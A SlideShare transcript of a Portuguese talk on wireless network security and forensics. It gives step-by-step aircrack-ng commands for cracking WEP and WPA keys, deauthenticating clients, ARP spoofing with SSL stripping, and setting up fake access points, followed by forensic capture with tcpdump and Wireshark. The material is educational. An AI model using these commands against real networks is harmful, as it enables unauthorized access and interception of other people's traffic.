Segurança e Forense em Redes de Computadores

919 visualizações

Publicada em

Palestra sobre segurança e computação forense em redes sem fio.

Publicada em: Internet
2 comentários
5 gostaram
Estatísticas
Notas
Sem downloads
Visualizações
Visualizações totais
919
No SlideShare
0
A partir de incorporações
0
Número de incorporações
9
Ações
Compartilhamentos
0
Downloads
78
Comentários
2
Gostaram
5
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Segurança e Forense em Redes de Computadores

  1. 1. Segurança e Forense em Redes de Computadores
  2. 2. whoami Euler Neto Entusiasta NTI GDG Aracaju Segurança (UFS São Cristóvão)
  3. 3. Segurança em Redes de Computadores sem fio
  4. 4. WLAN Frames
  5. 5. WLAN Frames ● Tipos ○ Management: manutenção da comunicação entre o access point e o cliente ○ Control: troca de dados entre o access point e o cliente ○ Data
  6. 6. WLAN Frames ● Management ○ Authentication ○ De-authentication ○ Association (Request e Response) ○ Reassociation (Request e Response) ○ Disassociation ○ Beacon ○ Probe (Request e Response)
  7. 7. WLAN Frames ● Control Frames ○ Request to Send (RTS) ○ Clear to Send (CTS) ○ Acknowledgement (ACK)
  8. 8. Aircrack-ng ● Conjunto de ferramentas para captura e análise em redes sem fio ● Principais ferramentas: ○ airmon-ng: ativar modo monitor da interface ○ airodump-ng: captura de dados na rede sem fio ○ aircrack-ng: quebra de chaves ○ aireplay-ng: injetar pacotes na rede sem fio
  9. 9. Interface de rede (NIC) ● Modo Normal: captura tráfego da rede que está associado ● Modo Monitor: captura qualquer dado que circula no ar
  10. 10. Interface de rede (NIC) ● Ativando modo Monitor com o aircrack-ng #: airmon-ng Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] #: airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)
  11. 11. Interface de rede (NIC) ● Ativando modo Monitor com o aircrack-ng #: airmon-ng Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0] mon0 Ralink 2573 USB rt73usb - [phy0]
  12. 12. Criptografia WLAN ● WEP ● WPA / WPA2
  13. 13. Criptografia WLAN ● WEP ○ Foi descoberto como quebrar em 2000 ○ Fragilidade pelo IV (vetor de inicialização) ○ Depende de tráfego na rede ○ Quanto mais pacotes capturados, melhor #: airodump-ng --bssid <endereço MAC do AP> --channel <canal> --write <arquivo> mon0
  14. 14. Criptografia WLAN ● WEP ○ Processo do airodump-ng CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP MyNetwork BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
  15. 15. Criptografia WLAN ● WEP ○ E se não houver tráfego? ○ É possível injetar pacotes para “simular” tráfego #: aireplay-ng -3 -b <endereço MAC do AP> -h <endereço MAC do cliente> mon0
  16. 16. Criptografia WLAN ● WEP ○ Processo do aireplay-ng (ARP Request) Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
  17. 17. Criptografia WLAN ● WEP ○ Utilizar aircrack-ng com o arquivo gerado pelo airodump-ng ○ Se funcionar, a senha da rede será revelada ○ Se não funcionar, repetir todo o processo capturando mais pacotes #: aireplay-ng -3 -b [endereço MAC do modem] -h [endereço MAC do cliente] mon0 #: aircrack-ng <arquivo>
  18. 18. Criptografia WLAN ● WEP ○ Processo do aircrack-ng Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
  19. 19. Criptografia WLAN ● WPA / WPA2 ○ WPA utiliza um algoritmo de segurança mais robusto (TKIP) ○ WPA2 utiliza um ainda mais robusto (AES-CCMP) ○ Mas ambos são vulneráveis a ataque de dicionário (WPA-Personal)
  20. 20. Criptografia WLAN ● WPA / WPA2 ○ Por que são vulneráveis?
  21. 21. Criptografia WLAN ● WPA / WPA2 ○ Também utilizando o airodump-ng ○ Após executar o airodump-ng, esperar por um handshake
  22. 22. Criptografia WLAN ● WPA / WPA2 ○ E se não tiver handshake? ○ Se já tiver algum usuário na rede, o força a reconectar ○ Se não tiver, infelizmente nada pode ser feito #: aircrack-ng [arquivo] #: aireplay-ng --deauth 1 -a <endereço MAC do usuário conectado> mon0
  23. 23. Criptografia WLAN ● WPA / WPA2 ○ Necessita de um bom dicionário #: aircrack-ng <arquivo> -w <dicionario>
  24. 24. Man-in-the-Middle ● Se colocar entre um cliente e o access point ● Interceptar o tráfego ● Algumas maneiras de fazer: ○ arp spoofing ○ Fake AP
  25. 25. Man-in-the-Middle ● Arp spoofing ○ Funcionamento do protocolo ARP ○ Vulnerabilidade do ARP ○ Explorando a vulnerabilidade
  26. 26. Man-in-the-Middle ● Protocolo ARP ○ ARP Request Quem é 192.168.1.5? Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6
  27. 27. Man-in-the-Middle ● Protocolo ARP ○ ARP Reply Quem é 192.168.1.5? EU! End. MAC: AA:AA:AA:AA Quem é 192.168.1.5? 192.168.1.3 192.168.1.6 192.168.1.5
  28. 28. Man-in-the-Middle ● ARP Spoof ○ ARP Request Quem é 192.168.1.5? Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6 Quem é 192.168.1.5?
  29. 29. Man-in-the-Middle ● ARP Spoof ○ ARP Reply (O atacante envia o sinal primeiro) Quem é 192.168.1.5? Quem é 192.168.1.5? 192.168.1.5 192.168.1.3 192.168.1.6 EU! End. MAC: AA:AA:AA:AA EU! End. MAC: BB:BB:BB:BB
  30. 30. Man-in-the-Middle ● Por que funciona? ○ Arp spoofing ○ “Engana” o cliente e o access point ○ Ativar encaminhamento de pacotes #: echo 1 > /proc/sys/net/ipv4/ip_forward
  31. 31. Man-in-the-Middle ● MITM Passivo ○ HTTP ○ Não há alteração de dados A A BB
  32. 32. Man-in-the-Middle ● MITM Passivo ○ Arpspoof #: arpspoof -i wlan0 -t <IP da vítima> <IP do gateway> #: arpspoof -i wlan0 -t <IP do gateway> <IP da vítima>
  33. 33. Man-in-the-Middle ● MITM Ativo ○ HTTPS ○ Alteração de dados A C BD
  34. 34. Man-in-the-Middle ● MITM Ativo ○ Arpspoof + SSL Strip #: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <porta não reservada> #: ssltrip -w <arquivo> -l <porta não reservada>
  35. 35. Man-in-the-Middle ● MITM Ativo ○ Resultado: certificado falso
  36. 36. Man-in-the-Middle ● MITM Ativo ○ Por que funciona? ■ Falta de informação do cliente
  37. 37. Man-in-the-Middle ● Fake AP ○ Criar um AP falso pra enganar a vítima ○ Honeypot ○ Cuidado com as redes preferenciais
  38. 38. Man-in-the-Middle ● Fake AP (Honeypot) ○ Atrair a vítima para o AP falso ○ Criar uma rede falsa com: 1. Mesmo ESSID que a vítima está associada 2. ESSID com um nome falso (ex: aeroporto, café, …)
  39. 39. Man-in-the-Middle ● Fake AP (Honeypot) ○ Rastrear clientes com airodump-ng ○ Criar o AP falso com airbase-ng #: airbase-ng --essid <nome do AP> -c <canal> mon0
  40. 40. Man-in-the-Middle ● Fake AP (Honeypot) ○ “Chamar” o cliente ○ Ou aumenta o seu sinal… ○ ...ou diminui o dele (?)
  41. 41. Man-in-the-Middle ● Fake AP ○ aircrack-ng
  42. 42. Análise Forense em Redes de Computadores sem fio
  43. 43. Conceitos ● Perícia forense: ”suporte técnico ao judiciário, realizado por pessoas capacitadas, para responder a quesitos aos quais o judiciário não dispõe de embasamento suficiente para julgar com precisão”
  44. 44. Conceitos ● Computação forense: ”área da computação responsável por dar resposta ao judiciário em questões envolvendo sistemas computacionais”
  45. 45. Conceitos ● Forense em redes: ”captura, armazenamento, manipulação e análise de dados que trafegam (ou trafegaram) em redes de computadores como parte de um processo investigativo”
  46. 46. Grampo digital ● Investigação através de um grampo digital ● Fases: ○ Instalação do grampo ○ Captura de dados ○ Análise de dados
  47. 47. Instalação do grampo ● Procedimento físico: identificar ponto de captura, técnica utilizada ● Técnicas ○ Monitorar portas ○ Interceptar dados
  48. 48. ● Através de portas de monitoramento Instalação do grampo A B C D mensagem de A para B B recebe Sniffer instalado D recebe todo tráfego de/para A
  49. 49. ● Através de interceptação intermediária Instalação do grampo A B C mensagem de A para B B recebe Sniffer instalado D recebe todo tráfego de/para A D
  50. 50. Instalação do grampo ● Grampo: host associado à rede ● Se não estiver associado ○ Captura em modo monitor ○ Quebra a chave
  51. 51. Captura de dados ● Procedimento lógico: escolha de software, parâmetros de captura, filtros ● Filtrar dados ○ Wireshark? ○ tcpdump
  52. 52. Captura de dados ● Filtros no tcpdump ○ Por host ○ De um host para outro #: tcpdump -X -vvv -n -i wlan0 -s0 host <IP> [ and host <IP>] #: tcpdump -X -vvv -n -i wlan0 -s0 src host <IP> and dst host <IP>
  53. 53. Captura de dados ● Filtros no tcpdump ○ Por porta ○ Gravando em arquivo #: tcpdump -X -vvv -n -i wlan0 -s0 port <porta> [ and port <porta>] #: tcpdump -X -vvv -n -i wlan0 -w <arquivo>
  54. 54. Análise de dados ● Identificar conteúdo capturado ● Responder ao judiciário ● Técnicas ○ Casamento de padrões ○ Campos do protocolo ○ Filtragem
  55. 55. Análise de dados ● Wireshark ○ Boa interface ○ Vários recursos ○ Exportação de pacotes (Follow TCP Stream) ● Chaosreader ○ Reconstrói sessão no formato HTML
  56. 56. Análise de dados ● Wireshark
  57. 57. Análise de dados ● Wireshark ○ Follow TCP Stream: ■ Baseado em protocolos TCP ■ Mostra sequência do tráfego ■ Exportação de dados
  58. 58. Análise de dados ● Chaosreader ○ Alguns screenshots: http://www.brendangregg. com/chaosreader.html
  59. 59. Conclusões ● Vulnerabilidades existem ● Conhecer como se ataca para se defender ● Área forense
  60. 60. Referências ● Ramashadran, Vivek. BackTrack 5 Wireless Penetration Test: Beginner’s Guide. Packt Publishing, 2011. ● Kléber, Ricardo. Introdução à Análise Forense em Redes de Computadores: conceitos, técnicase ferramentas para “grampos digitais”. Novatec, 2013.

×